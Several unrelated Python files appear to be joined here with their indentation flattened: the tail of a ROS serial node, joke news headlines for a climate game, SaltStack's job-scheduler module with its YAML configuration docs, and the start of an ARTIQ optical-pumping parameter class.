# the 0-th arg is the name of the file itself, so we want the 1st and 2nd
# We're making this a class now.
s_tx = SerialTxFromTopic(sys.argv[1])
# We do the spin() in main. It's not appropriate for a constructor.
try:
rospy.spin()
except KeyboardInterrupt:
pass
|
def get_level_1_news():
news1 = 'Stars Wars movie filming is canceled due to high electrical energy used. Turns out' \
'those lasers don\'t power themselves'
news2 = 'Pink Floyd Tour canceled after first show used up the whole energy city had for' \
'the whole month. The band says they\'ll be happy to play on the dark side of the town'
news3 = 'A public poll shows people are spending more energy on electric heaters after the ' \
'start of the cold war'
news4 = "9 in 10 people of your country do not know what the cold war is. The one who knows " \
"is in the military"
news5 = "Scientists says that world temperatures are rising due to high number of home " \
"refrigerators being used worldwide. According to Mr. Midgley, all the earth's" \
" cold is being trapped inside 4 billion refrigerators"
news6 = "Mr. Midgley published a new research where he's proved that ceiling and wall fans" \
" are causing hurricanes"
news7 = "Mr. Midgley, again, says he's discovered a way to revert climate change: everybody" \
" should throw their refrigerator's ice cubes into the ocean"
news8 = "After a whole year of snow falling almost in every corner of the world, Mr. " \
"Midgley says he knows nothing and announced his retirement"
news9 = "Free nuclear fusion energy is a reality, says scientist, we just need to learn " \
"how to do it"
news10 = "RMS Titanic reaches its destiny safely after hitting a small chunk of ice in" \
" the ocean"
news11 = "All the Ice Sculptures business worldwide have declared bankruptcy, says" \
" World Bank"
news12 = "After 'Star Wars: The Phantom Menace' script was leaked people are happy the " \
"franchise got canceled 30 years ago"
news13 = "Microsoft's head says Windows95 will be the last one to ever be launched due to its" \
" low energy use"
news14 = "Programmers for Climate Change Convention ends in confusion after fight over using" \
" tabs or spaces"
news15 = "The series finale of Game of Thrones lowered the Public Well being index of your" \
" nation by x%"
news16 = "Drake's song 'Hotline Bling' is under investigation for being related to higher" \
" temperatures in the US this year"
news17 = "The blockbuster 'Mad Max: Fury Road' shows a sequel of the world we live in, " \
"says director"
news18 = "Lost's last episode is an homage to our own world, which will also have a crappy " \
"ending, says fan"
news19 = "Pearl Harbor movie filming canceled due to the harbor being flooded by the " \
"advancing ocean"
news20 = "Award winning Dwight Schrute's movie 'Recyclops' to gain sequels: 'Recyclops " \
"Reloaded' and 'Recyclops Revolution'"
news21 = "The Simpsons predicted nuclear power scandal in episode where Homer pushes big" \
" red button for no reason"
news = {
'news1': news1,
'news2': news2,
'news3': news3,
'news4': news4,
'news5': news5,
'news6': news6,
'news7': news7,
'news8': news8,
'news9': news9,
'news10': news10,
'news11': news11,
'news12': news12,
'news13': news13,
'news14': news14,
'news15': news15,
'news16': news16,
'news17': news17,
'news18': news18,
'news19': news19,
'news20': news20,
'news21': news21
}
return news
def get_level_2_news():
news1 = "Your X index is up Y% and your N index is down because of Z"
news2 = "President PLAYER_NAME canceled Formula 1 race to save fuel, Public well being, " \
"acceptance and co2 emissions are down x%"
news = {
'news1': news1,
'news2': news2
}
return news
def get_level_3_news():
news1 = "Your X index is down Y% because of Z"
news2 = "In order to save energy, President PLAYER_NAME sanctions law that prohibits people " \
"of ever ironing their clothes. People are so happy that public well being index is" \
" up x% and energy use is down y%"
news = {
'news1': news1,
'news2': news2
}
return news
def get_level_4_news():
news1 = "Your X index is down Y% and it also affected your Z index which is down N%"
news = {
'news1': news1
}
return news
def get_level_5_news():
news1 = "Your X index is down X%, XYZ thing just happened"
news2 = "The Amazon River, the biggest in the world, dries up and becomes the world's " \
"biggest desert"
news3 = "Plants can no longer recognize what season we are on. They now bloom at random " \
"moments of the year"
news = {
'news1': news1,
'news2': news2,
'news3': news3
}
return news
|
# -*- coding: utf-8 -*-
'''
Scheduling routines are located here. To activate the scheduler make the
schedule option available to the master or minion configurations (master config
file or for the minion via config or pillar)
.. code-block:: yaml
schedule:
job1:
function: state.sls
seconds: 3600
args:
- httpd
kwargs:
test: True
This will schedule the command: state.sls httpd test=True every 3600 seconds
(every hour)
.. code-block:: yaml
schedule:
job1:
function: state.sls
seconds: 3600
args:
- httpd
kwargs:
test: True
splay: 15
This will schedule the command: state.sls httpd test=True every 3600 seconds
(every hour) splaying the time between 0 and 15 seconds
.. code-block:: yaml
schedule:
job1:
function: state.sls
seconds: 3600
args:
- httpd
kwargs:
test: True
splay:
start: 10
end: 15
This will schedule the command: state.sls httpd test=True every 3600 seconds
(every hour) splaying the time between 10 and 15 seconds
.. versionadded:: 2014.7.0
Frequency of jobs can also be specified using date strings supported by
the python dateutil library.
.. code-block:: yaml
schedule:
job1:
function: state.sls
args:
- httpd
kwargs:
test: True
when: 5:00pm
This will schedule the command: state.sls httpd test=True at 5:00pm minion
localtime.
.. code-block:: yaml
schedule:
job1:
function: state.sls
args:
- httpd
kwargs:
test: True
when:
- Monday 5:00pm
- Tuesday 3:00pm
- Wednesday 5:00pm
- Thursday 3:00pm
- Friday 5:00pm
This will schedule a job to run once on the specified date. The default date
format is ISO 8601 but can be overridden by also specifying the ``once_fmt``
option.
.. code-block:: yaml
schedule:
job1:
function: test.ping
once: 2015-04-22T20:21:00
once_fmt: '%Y-%m-%dT%H:%M:%S'
This will schedule the command: state.sls httpd test=True at 5pm on Monday,
Wednesday and Friday, and 3pm on Tuesday and Thursday.
.. code-block:: yaml
schedule:
job1:
function: state.sls
seconds: 3600
args:
- httpd
kwargs:
test: True
range:
start: 8:00am
end: 5:00pm
This will schedule the command: state.sls httpd test=True every 3600 seconds
(every hour) between the hours of 8am and 5pm. The range parameter must be a
dictionary with the date strings using the dateutil format.
.. versionadded:: 2014.7.0
.. code-block:: yaml
schedule:
job1:
function: state.sls
seconds: 3600
args:
- httpd
kwargs:
test: True
range:
invert: True
start: 8:00am
end: 5:00pm
Using the invert option for range, this will schedule the command: state.sls
httpd test=True every 3600 seconds (every hour) until the current time is
between the hours of 8am and 5pm. The range parameter must be a dictionary
with the date strings using the dateutil format.
By default any job scheduled based on the startup time of the minion will run
the scheduled job when the minion starts up. Sometimes this is not the desired
situation. Using the 'run_on_start' parameter set to False will cause the
scheduler to skip this first run and wait until the next scheduled run.
.. versionadded:: 2015.5.0
.. code-block:: yaml
schedule:
job1:
function: state.sls
seconds: 3600
run_on_start: False
args:
- httpd
kwargs:
test: True
.. versionadded:: 2014.7.0
.. code-block:: yaml
schedule:
job1:
function: state.sls
cron: '*/15 * * * *'
args:
- httpd
kwargs:
test: True
The scheduler also supports scheduling jobs using a cron like format.
This requires the python-croniter library.
... versionadded:: Beryllium
schedule:
job1:
function: state.sls
seconds: 15
until: '12/31/2015 11:59pm'
args:
- httpd
kwargs:
test: True
Using the until argument, the Salt scheduler allows you to specify
an end time for a scheduled job. If this argument is specified, jobs
will not run once the specified time has passed. Time should be specified
in a format support by the dateutil library.
This requires the python-dateutil library.
... versionadded:: Beryllium
schedule:
job1:
function: state.sls
seconds: 15
after: '12/31/2015 11:59pm'
args:
- httpd
kwargs:
test: True
Using the after argument, the Salt scheduler allows you to specify
an start time for a scheduled job. If this argument is specified, jobs
will not run until the specified time has passed. Time should be specified
in a format support by the dateutil library.
This requires the python-dateutil library.
The scheduler also supports ensuring that there are no more than N copies of
a particular routine running. Use this for jobs that may be long-running
and could step on each other or pile up in case of infrastructure outage.
The default for maxrunning is 1.
.. code-block:: yaml
schedule:
long_running_job:
function: big_file_transfer
jid_include: True
maxrunning: 1
By default, data about jobs runs from the Salt scheduler is not returned to the
master. Because of this information for these jobs will not be listed in the
:py:func:`jobs.list_jobs <salt.runners.jobs.list_jobs>` runner. The
``return_job`` parameter will return the data back to the Salt master, making
the job available in this list.
.. versionadded:: 2015.5.0
schedule:
job1:
function: scheduled_job_function
return_job: True
It can be useful to include specific data to differentiate a job from other
jobs. Using the metadata parameter special values can be associated with
a scheduled job. These values are not used in the execution of the job,
but can be used to search for specific jobs later if combined with the
return_job parameter. The metadata parameter must be specified as a
dictionary, othewise it will be ignored.
.. versionadded:: 2015.5.0
schedule:
job1:
function: scheduled_job_function
metadata:
foo: bar
'''
# Import python libs
from __future__ import absolute_import
import os
import time
import datetime
import itertools
import multiprocessing
import threading
import sys
import logging
import errno
import random
# Import Salt libs
import salt.utils
import salt.utils.jid
import salt.utils.process
import salt.utils.args
import salt.loader
import salt.minion
import salt.payload
import salt.syspaths
from salt.utils.odict import OrderedDict
from salt.utils.process import os_is_running
# Import 3rd-party libs
import yaml
import salt.ext.six as six
# pylint: disable=import-error
try:
import dateutil.parser as dateutil_parser
_WHEN_SUPPORTED = True
_RANGE_SUPPORTED = True
except ImportError:
_WHEN_SUPPORTED = False
_RANGE_SUPPORTED = False
try:
import croniter
_CRON_SUPPORTED = True
except ImportError:
_CRON_SUPPORTED = False
# pylint: enable=import-error
log = logging.getLogger(__name__)
class Schedule(object):
'''
Create a Schedule object, pass in the opts and the functions dict to use
'''
def __init__(self, opts, functions, returners=None, intervals=None):
self.opts = opts
self.functions = functions
if isinstance(intervals, dict):
self.intervals = intervals
else:
self.intervals = {}
if hasattr(returners, '__getitem__'):
self.returners = returners
else:
self.returners = returners.loader.gen_functions()
self.time_offset = self.functions.get('timezone.get_offset', lambda: '0000')()
self.schedule_returner = self.option('schedule_returner')
# Keep track of the lowest loop interval needed in this variable
self.loop_interval = sys.maxint
clean_proc_dir(opts)
def option(self, opt):
'''
Return the schedule data structure
'''
if 'config.merge' in self.functions:
return self.functions['config.merge'](opt, {}, omit_master=True)
return self.opts.get(opt, {})
def persist(self):
'''
Persist the modified schedule into <<configdir>>/minion.d/_schedule.conf
'''
schedule_conf = os.path.join(
salt.syspaths.CONFIG_DIR,
'minion.d',
'_schedule.conf')
log.debug('Persisting schedule')
try:
with salt.utils.fopen(schedule_conf, 'wb+') as fp_:
fp_.write(yaml.dump({'schedule': self.opts['schedule']}))
except (IOError, OSError):
log.error('Failed to persist the updated schedule')
def delete_job(self, name, persist=True, where=None):
'''
Deletes a job from the scheduler.
'''
if where is None or where != 'pillar':
# ensure job exists, then delete it
if name in self.opts['schedule']:
del self.opts['schedule'][name]
schedule = self.opts['schedule']
else:
# If job is in pillar, delete it there too
if 'schedule' in self.opts['pillar']:
if name in self.opts['pillar']['schedule']:
del self.opts['pillar']['schedule'][name]
schedule = self.opts['pillar']['schedule']
# Fire the complete event back along with updated list of schedule
evt = salt.utils.event.get_event('minion', opts=self.opts)
evt.fire_event({'complete': True, 'schedule': schedule},
tag='/salt/minion/minion_schedule_delete_complete')
# remove from self.intervals
if name in self.intervals:
del self.intervals[name]
if persist:
self.persist()
def add_job(self, data, persist=True):
'''
Adds a new job to the scheduler. The format is the same as required in
the configuration file. See the docs on how YAML is interpreted into
python data-structures to make sure, you pass correct dictionaries.
'''
# we don't do any checking here besides making sure its a dict.
# eval() already does for us and raises errors accordingly
if not isinstance(data, dict):
raise ValueError('Scheduled jobs have to be of type dict.')
if not len(data) == 1:
raise ValueError('You can only schedule one new job at a time.')
new_job = next(six.iterkeys(data))
if new_job in self.opts['schedule']:
log.info('Updating job settings for scheduled '
'job: {0}'.format(new_job))
else:
log.info('Added new job {0} to scheduler'.format(new_job))
self.opts['schedule'].update(data)
# Fire the complete event back along with updated list of schedule
evt = salt.utils.event.get_event('minion', opts=self.opts)
evt.fire_event({'complete': True, 'schedule': self.opts['schedule']},
tag='/salt/minion/minion_schedule_add_complete')
if persist:
self.persist()
def enable_job(self, name, persist=True, where=None):
'''
Enable a job in the scheduler.
'''
if where == 'pillar':
self.opts['pillar']['schedule'][name]['enabled'] = True
schedule = self.opts['pillar']['schedule']
else:
self.opts['schedule'][name]['enabled'] = True
schedule = self.opts['schedule']
# Fire the complete event back along with updated list of schedule
evt = salt.utils.event.get_event('minion', opts=self.opts)
evt.fire_event({'complete': True, 'schedule': schedule},
tag='/salt/minion/minion_schedule_enabled_job_complete')
log.info('Enabling job {0} in scheduler'.format(name))
if persist:
self.persist()
def disable_job(self, name, persist=True, where=None):
'''
Disable a job in the scheduler.
'''
if where == 'pillar':
self.opts['pillar']['schedule'][name]['enabled'] = False
schedule = self.opts['pillar']['schedule']
else:
self.opts['schedule'][name]['enabled'] = False
schedule = self.opts['schedule']
# Fire the complete event back along with updated list of schedule
evt = salt.utils.event.get_event('minion', opts=self.opts)
evt.fire_event({'complete': True, 'schedule': schedule},
tag='/salt/minion/minion_schedule_disabled_job_complete')
log.info('Disabling job {0} in scheduler'.format(name))
if persist:
self.persist()
def modify_job(self, name, schedule, persist=True, where=None):
'''
Modify a job in the scheduler.
'''
if where == 'pillar':
if name in self.opts['pillar']['schedule']:
self.delete_job(name, persist, where=where)
self.opts['pillar']['schedule'][name] = schedule
else:
if name in self.opts['schedule']:
self.delete_job(name, persist, where=where)
self.opts['schedule'][name] = schedule
if persist:
self.persist()
def run_job(self, name):
'''
Run a schedule job now
'''
schedule = self.opts['schedule']
if 'schedule' in self.opts['pillar']:
schedule.update(self.opts['pillar']['schedule'])
data = schedule[name]
if 'function' in data:
func = data['function']
elif 'func' in data:
func = data['func']
elif 'fun' in data:
func = data['fun']
else:
func = None
if func not in self.functions:
log.info(
'Invalid function: {0} in job {1}. Ignoring.'.format(
func, name
)
)
else:
if 'name' not in data:
data['name'] = name
log.info(
'Running Job: {0}.'.format(name)
)
if self.opts.get('multiprocessing', True):
thread_cls = multiprocessing.Process
else:
thread_cls = threading.Thread
proc = thread_cls(target=self.handle_func, args=(func, data))
proc.start()
if self.opts.get('multiprocessing', True):
proc.join()
def enable_schedule(self):
'''
Enable the scheduler.
'''
self.opts['schedule']['enabled'] = True
# Fire the complete event back along with updated list of schedule
evt = salt.utils.event.get_event('minion', opts=self.opts)
evt.fire_event({'complete': True, 'schedule': self.opts['schedule']},
tag='/salt/minion/minion_schedule_enabled_complete')
def disable_schedule(self):
'''
Disable the scheduler.
'''
self.opts['schedule']['enabled'] = False
# Fire the complete event back along with updated list of schedule
evt = salt.utils.event.get_event('minion', opts=self.opts)
evt.fire_event({'complete': True, 'schedule': self.opts['schedule']},
tag='/salt/minion/minion_schedule_disabled_complete')
def reload(self, schedule):
'''
Reload the schedule from saved schedule file.
'''
# Remove all jobs from self.intervals
self.intervals = {}
if 'schedule' in self.opts:
if 'schedule' in schedule:
self.opts['schedule'].update(schedule['schedule'])
else:
self.opts['schedule'].update(schedule)
else:
self.opts['schedule'] = schedule
def list(self, where):
'''
List the current schedule items
'''
schedule = {}
if where == 'pillar':
if 'schedule' in self.opts['pillar']:
schedule.update(self.opts['pillar']['schedule'])
elif where == 'opts':
schedule.update(self.opts['schedule'])
else:
schedule.update(self.opts['schedule'])
if 'schedule' in self.opts['pillar']:
schedule.update(self.opts['pillar']['schedule'])
# Fire the complete event back along with the list of schedule
evt = salt.utils.event.get_event('minion', opts=self.opts)
evt.fire_event({'complete': True, 'schedule': schedule},
tag='/salt/minion/minion_schedule_list_complete')
def save_schedule(self):
'''
Save the current schedule
'''
self.persist()
# Fire the complete event back along with the list of schedule
evt = salt.utils.event.get_event('minion', opts=self.opts)
evt.fire_event({'complete': True},
tag='/salt/minion/minion_schedule_saved')
def handle_func(self, func, data):
'''
Execute this method in a multiprocess or thread
'''
if salt.utils.is_windows():
# Since function references can't be pickled and pickling
# is required when spawning new processes on Windows, regenerate
# the functions and returners.
self.functions = salt.loader.minion_mods(self.opts)
self.returners = salt.loader.returners(self.opts, self.functions)
ret = {'id': self.opts.get('id', 'master'),
'fun': func,
'schedule': data['name'],
'jid': salt.utils.jid.gen_jid()}
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
ret['metadata']['_TOS'] = self.time_offset
ret['metadata']['_TS'] = time.ctime()
ret['metadata']['_TT'] = time.strftime('%Y %B %d %a %H %m', time.gmtime())
else:
log.warning('schedule: The metadata parameter must be '
'specified as a dictionary. Ignoring.')
salt.utils.appendproctitle(ret['jid'])
proc_fn = os.path.join(
salt.minion.get_proc_dir(self.opts['cachedir']),
ret['jid']
)
# Check to see if there are other jobs with this
# signature running. If there are more than maxrunning
# jobs present then don't start another.
# If jid_include is False for this job we can ignore all this
# NOTE--jid_include defaults to True, thus if it is missing from the data
# dict we treat it like it was there and is True
if 'jid_include' not in data or data['jid_include']:
jobcount = 0
for basefilename in os.listdir(salt.minion.get_proc_dir(self.opts['cachedir'])):
fn_ = os.path.join(salt.minion.get_proc_dir(self.opts['cachedir']), basefilename)
if not os.path.exists(fn_):
log.debug('schedule.handle_func: {0} was processed '
'in another thread, skipping.'.format(
basefilename))
continue
with salt.utils.fopen(fn_, 'rb') as fp_:
job = salt.payload.Serial(self.opts).load(fp_)
if job:
if 'schedule' in job:
log.debug('schedule.handle_func: Checking job against '
'fun {0}: {1}'.format(ret['fun'], job))
if ret['schedule'] == job['schedule'] and os_is_running(job['pid']):
jobcount += 1
log.debug(
'schedule.handle_func: Incrementing jobcount, now '
'{0}, maxrunning is {1}'.format(
jobcount, data['maxrunning']))
if jobcount >= data['maxrunning']:
log.debug(
'schedule.handle_func: The scheduled job {0} '
'was not started, {1} already running'.format(
ret['schedule'], data['maxrunning']))
return False
else:
try:
log.info('Invalid job file found. Removing.')
os.remove(fn_)
except OSError:
log.info('Unable to remove file: {0}.'.format(fn_))
salt.utils.daemonize_if(self.opts)
ret['pid'] = os.getpid()
if 'jid_include' not in data or data['jid_include']:
log.debug('schedule.handle_func: adding this job to the jobcache '
'with data {0}'.format(ret))
# write this to /var/cache/salt/minion/proc
with salt.utils.fopen(proc_fn, 'w+b') as fp_:
fp_.write(salt.payload.Serial(self.opts).dumps(ret))
args = tuple()
if 'args' in data:
args = data['args']
kwargs = {}
if 'kwargs' in data:
kwargs = data['kwargs']
# if the func support **kwargs, lets pack in the pub data we have
# TODO: pack the *same* pub data as a minion?
argspec = salt.utils.args.get_function_argspec(self.functions[func])
if argspec.keywords:
# this function accepts **kwargs, pack in the publish data
for key, val in six.iteritems(ret):
kwargs['__pub_{0}'.format(key)] = val
try:
ret['return'] = self.functions[func](*args, **kwargs)
data_returner = data.get('returner', None)
if data_returner or self.schedule_returner:
if 'returner_config' in data:
ret['ret_config'] = data['returner_config']
rets = []
for returner in [data_returner, self.schedule_returner]:
if isinstance(returner, str):
rets.append(returner)
elif isinstance(returner, list):
rets.extend(returner)
# simple de-duplication with order retained
for returner in OrderedDict.fromkeys(rets):
ret_str = '{0}.returner'.format(returner)
if ret_str in self.returners:
ret['success'] = True
self.returners[ret_str](ret)
else:
log.info(
'Job {0} using invalid returner: {1}. Ignoring.'.format(
func, returner
)
)
if 'return_job' in data and data['return_job']:
# Send back to master so the job is included in the job list
mret = ret.copy()
mret['jid'] = 'req'
channel = salt.transport.Channel.factory(self.opts, usage='salt_schedule')
load = {'cmd': '_return', 'id': self.opts['id']}
for key, value in six.iteritems(mret):
load[key] = value
channel.send(load)
except Exception:
log.exception("Unhandled exception running {0}".format(ret['fun']))
# Although catch-all exception handlers are bad, the exception here
# is to let the exception bubble up to the top of the thread context,
# where the thread will die silently, which is worse.
finally:
try:
log.debug('schedule.handle_func: Removing {0}'.format(proc_fn))
os.unlink(proc_fn)
except OSError as exc:
if exc.errno == errno.EEXIST or exc.errno == errno.ENOENT:
# EEXIST and ENOENT are OK because the file is gone and that's what
# we wanted
pass
else:
log.error("Failed to delete '{0}': {1}".format(proc_fn, exc.errno))
# Otherwise, failing to delete this file is not something
# we can cleanly handle.
raise
def eval(self):
'''
Evaluate and execute the schedule
'''
schedule = self.option('schedule')
if not isinstance(schedule, dict):
raise ValueError('Schedule must be of type dict.')
if 'enabled' in schedule and not schedule['enabled']:
return
for job, data in six.iteritems(schedule):
if job == 'enabled' or not data:
continue
if not isinstance(data, dict):
log.error('Scheduled job "{0}" should have a dict value, not {1}'.format(job, type(data)))
continue
# Job is disabled, continue
if 'enabled' in data and not data['enabled']:
continue
if 'function' in data:
func = data['function']
elif 'func' in data:
func = data['func']
elif 'fun' in data:
func = data['fun']
else:
func = None
if func not in self.functions:
log.info(
'Invalid function: {0} in job {1}. Ignoring.'.format(
func, job
)
)
continue
if 'name' not in data:
data['name'] = job
# Add up how many seconds between now and then
when = 0
seconds = 0
cron = 0
now = int(time.time())
if 'until' in data:
if not _WHEN_SUPPORTED:
log.error('Missing python-dateutil.'
'Ignoring until.')
else:
until__ = dateutil_parser.parse(data['until'])
until = int(time.mktime(until__.timetuple()))
if until <= now:
log.debug('Until time has passed '
'skipping job: {0}.'.format(data['name']))
continue
if 'after' in data:
if not _WHEN_SUPPORTED:
log.error('Missing python-dateutil.'
'Ignoring after.')
else:
after__ = dateutil_parser.parse(data['after'])
after = int(time.mktime(after__.timetuple()))
if after >= now:
log.debug('After time has not passed '
'skipping job: {0}.'.format(data['name']))
continue
# Used for quick lookups when detecting invalid option combinations.
schedule_keys = set(data.keys())
time_elements = ('seconds', 'minutes', 'hours', 'days')
scheduling_elements = ('when', 'cron', 'once')
invalid_sched_combos = [set(i)
for i in itertools.combinations(scheduling_elements, 2)]
if any(i <= schedule_keys for i in invalid_sched_combos):
log.error('Unable to use "{0}" options together. Ignoring.'
.format('", "'.join(scheduling_elements)))
continue
invalid_time_combos = []
for item in scheduling_elements:
all_items = itertools.chain([item], time_elements)
invalid_time_combos.append(
set(itertools.combinations(all_items, 2)))
if any(set(x) <= schedule_keys for x in invalid_time_combos):
log.error('Unable to use "{0}" with "{1}" options. Ignoring'
.format('", "'.join(time_elements),
'", "'.join(scheduling_elements)))
continue
if True in [True for item in time_elements if item in data]:
# Add up how many seconds between now and then
seconds += int(data.get('seconds', 0))
seconds += int(data.get('minutes', 0)) * 60
seconds += int(data.get('hours', 0)) * 3600
seconds += int(data.get('days', 0)) * 86400
elif 'once' in data:
once_fmt = data.get('once_fmt', '%Y-%m-%dT%H:%M:%S')
try:
once = datetime.datetime.strptime(data['once'], once_fmt)
once = int(time.mktime(once.timetuple()))
except (TypeError, ValueError):
log.error('Date string could not be parsed: %s, %s',
data['once'], once_fmt)
continue
if now != once:
continue
else:
seconds = 1
elif 'when' in data:
if not _WHEN_SUPPORTED:
log.error('Missing python-dateutil.'
'Ignoring job {0}'.format(job))
continue
if isinstance(data['when'], list):
_when = []
for i in data['when']:
if ('whens' in self.opts['pillar'] and
i in self.opts['pillar']['whens']):
if not isinstance(self.opts['pillar']['whens'],
dict):
log.error('Pillar item "whens" must be dict.'
'Ignoring')
continue
__when = self.opts['pillar']['whens'][i]
try:
when__ = dateutil_parser.parse(__when)
except ValueError:
log.error('Invalid date string. Ignoring')
continue
elif ('whens' in self.opts['grains'] and
i in self.opts['grains']['whens']):
if not isinstance(self.opts['grains']['whens'],
dict):
log.error('Grain "whens" must be dict.'
'Ignoring')
continue
__when = self.opts['grains']['whens'][i]
try:
when__ = dateutil_parser.parse(__when)
except ValueError:
log.error('Invalid date string. Ignoring')
continue
else:
try:
when__ = dateutil_parser.parse(i)
except ValueError:
log.error('Invalid date string {0}.'
'Ignoring job {1}.'.format(i, job))
continue
when = int(time.mktime(when__.timetuple()))
if when >= now:
_when.append(when)
_when.sort()
if _when:
# Grab the first element
# which is the next run time
when = _when[0]
# If we're switching to the next run in a list
# ensure the job can run
if '_when' in data and data['_when'] != when:
data['_when_run'] = True
data['_when'] = when
seconds = when - now
# scheduled time is in the past
if seconds < 0:
continue
if '_when_run' not in data:
data['_when_run'] = True
# Backup the run time
if '_when' not in data:
data['_when'] = when
# A new 'when' ensure _when_run is True
if when > data['_when']:
data['_when'] = when
data['_when_run'] = True
else:
continue
else:
if ('whens' in self.opts['pillar'] and
data['when'] in self.opts['pillar']['whens']):
if not isinstance(self.opts['pillar']['whens'], dict):
log.error('Pillar item "whens" must be dict.'
'Ignoring')
continue
_when = self.opts['pillar']['whens'][data['when']]
try:
when__ = dateutil_parser.parse(_when)
except ValueError:
log.error('Invalid date string. Ignoring')
continue
elif ('whens' in self.opts['grains'] and
data['when'] in self.opts['grains']['whens']):
if not isinstance(self.opts['grains']['whens'], dict):
log.error('Grain "whens" must be dict. Ignoring')
continue
_when = self.opts['grains']['whens'][data['when']]
try:
when__ = dateutil_parser.parse(_when)
except ValueError:
log.error('Invalid date string. Ignoring')
continue
else:
try:
when__ = dateutil_parser.parse(data['when'])
except ValueError:
log.error('Invalid date string. Ignoring')
continue
when = int(time.mktime(when__.timetuple()))
now = int(time.time())
seconds = when - now
# scheduled time is in the past
if seconds < 0:
continue
if '_when_run' not in data:
data['_when_run'] = True
# Backup the run time
if '_when' not in data:
data['_when'] = when
# A new 'when' ensure _when_run is True
if when > data['_when']:
data['_when'] = when
data['_when_run'] = True
elif 'cron' in data:
if not _CRON_SUPPORTED:
log.error('Missing python-croniter. Ignoring job {0}'.format(job))
continue
now = int(time.mktime(datetime.datetime.now().timetuple()))
try:
cron = int(croniter.croniter(data['cron'], now).get_next())
except (ValueError, KeyError):
log.error('Invalid cron string. Ignoring')
continue
seconds = cron - now
else:
continue
# Check if the seconds variable is lower than current lowest
# loop interval needed. If it is lower than overwrite variable
# external loops using can then check this variable for how often
# they need to reschedule themselves
# Not used with 'when' parameter, causes run away jobs and CPU
# spikes.
if 'when' not in data:
if seconds < self.loop_interval:
self.loop_interval = seconds
run = False
if 'splay' in data:
if 'when' in data:
log.error('Unable to use "splay" with "when" option at this time. Ignoring.')
elif 'cron' in data:
log.error('Unable to use "splay" with "cron" option at this time. Ignoring.')
else:
if '_seconds' not in data:
log.debug('The _seconds parameter is missing, '
'most likely the first run or the schedule '
'has been refreshed refresh.')
if 'seconds' in data:
data['_seconds'] = data['seconds']
else:
data['_seconds'] = 0
if job in self.intervals:
if 'when' in data:
if seconds == 0:
if data['_when_run']:
data['_when_run'] = False
run = True
elif 'cron' in data:
if seconds == 1:
run = True
else:
if now - self.intervals[job] >= seconds:
run = True
else:
if 'when' in data:
if seconds == 0:
if data['_when_run']:
data['_when_run'] = False
run = True
elif 'cron' in data:
if seconds == 1:
run = True
else:
# If run_on_start is True, the job will run when the Salt
# minion start. If the value is False will run at the next
# scheduled run. Default is True.
if 'run_on_start' in data:
if data['run_on_start']:
run = True
else:
self.intervals[job] = int(time.time())
else:
run = True
if run:
if 'range' in data:
if not _RANGE_SUPPORTED:
log.error('Missing python-dateutil. Ignoring job {0}'.format(job))
continue
else:
if isinstance(data['range'], dict):
try:
start = int(time.mktime(dateutil_parser.parse(data['range']['start']).timetuple()))
except ValueError:
log.error('Invalid date string for start. Ignoring job {0}.'.format(job))
continue
try:
end = int(time.mktime(dateutil_parser.parse(data['range']['end']).timetuple()))
except ValueError:
log.error('Invalid date string for end. Ignoring job {0}.'.format(job))
continue
if end > start:
if 'invert' in data['range'] and data['range']['invert']:
if now <= start or now >= end:
run = True
else:
run = False
else:
if now >= start and now <= end:
run = True
else:
run = False
else:
log.error('schedule.handle_func: Invalid range, end must be larger than start. \
Ignoring job {0}.'.format(job))
continue
else:
log.error('schedule.handle_func: Invalid, range must be specified as a dictionary. \
Ignoring job {0}.'.format(job))
continue
if not run:
continue
else:
if 'splay' in data:
if 'when' in data:
log.error('Unable to use "splay" with "when" option at this time. Ignoring.')
else:
if isinstance(data['splay'], dict):
if data['splay']['end'] >= data['splay']['start']:
splay = random.randint(data['splay']['start'], data['splay']['end'])
else:
log.error('schedule.handle_func: Invalid Splay, end must be larger than start. \
Ignoring splay.')
splay = None
else:
splay = random.randint(0, data['splay'])
if splay:
log.debug('schedule.handle_func: Adding splay of '
'{0} seconds to next run.'.format(splay))
if 'seconds' in data:
data['seconds'] = data['_seconds'] + splay
else:
data['seconds'] = 0 + splay
log.info('Running scheduled job: {0}'.format(job))
if 'jid_include' not in data or data['jid_include']:
data['jid_include'] = True
log.debug('schedule: This job was scheduled with jid_include, '
'adding to cache (jid_include defaults to True)')
if 'maxrunning' in data:
log.debug('schedule: This job was scheduled with a max '
'number of {0}'.format(data['maxrunning']))
else:
log.info('schedule: maxrunning parameter was not specified for '
'job {0}, defaulting to 1.'.format(job))
data['maxrunning'] = 1
if salt.utils.is_windows():
# Temporarily stash our function references.
# You can't pickle function references, and pickling is
# required when spawning new processes on Windows.
functions = self.functions
self.functions = {}
returners = self.returners
self.returners = {}
try:
if self.opts.get('multiprocessing', True):
thread_cls = multiprocessing.Process
else:
thread_cls = threading.Thread
proc = thread_cls(target=self.handle_func, args=(func, data))
proc.start()
if self.opts.get('multiprocessing', True):
proc.join()
finally:
self.intervals[job] = now
if salt.utils.is_windows():
# Restore our function references.
self.functions = functions
self.returners = returners
def clean_proc_dir(opts):
'''
Loop through jid files in the minion proc directory (default /var/cache/salt/minion/proc)
and remove any that refer to processes that no longer exist
'''
for basefilename in os.listdir(salt.minion.get_proc_dir(opts['cachedir'])):
fn_ = os.path.join(salt.minion.get_proc_dir(opts['cachedir']), basefilename)
with salt.utils.fopen(fn_, 'rb') as fp_:
job = None
try:
job = salt.payload.Serial(opts).load(fp_)
except Exception: # It's corrupted
# Windows cannot delete an open file
if salt.utils.is_windows():
fp_.close()
try:
os.unlink(fn_)
continue
except OSError:
continue
log.debug('schedule.clean_proc_dir: checking job {0} for process '
'existence'.format(job))
if job is not None and 'pid' in job:
if salt.utils.process.os_is_running(job['pid']):
log.debug('schedule.clean_proc_dir: Cleaning proc dir, '
'pid {0} still exists.'.format(job['pid']))
else:
# Windows cannot delete an open file
if salt.utils.is_windows():
fp_.close()
# Maybe the file is already gone
try:
os.unlink(fn_)
except OSError:
pass
|
from artiq.experiment import *
class AuxOpticalPumping:
frequency_866="DopplerCooling.doppler_cooling_frequency_866"
amplitude_866="DopplerCooling.doppler_cooling_amplitude_866"
att_866="DopplerCooling.doppler_cooling_att_866"
frequency_854="OpticalPumping.optical_pumping_frequency_854"
amplitude_854="OpticalPumpingAux.amp_854"
att_854="OpticalPumpingAux.att_854"
line_selection="OpticalPumpingAux.line_selection"
channel_729="OpticalPumpingAux.channel_729"
duration="OpticalPumpingAux.duration"
rempump_duration="OpticalPumpingContinuous.optical_pumping_continuous_repump_additional"
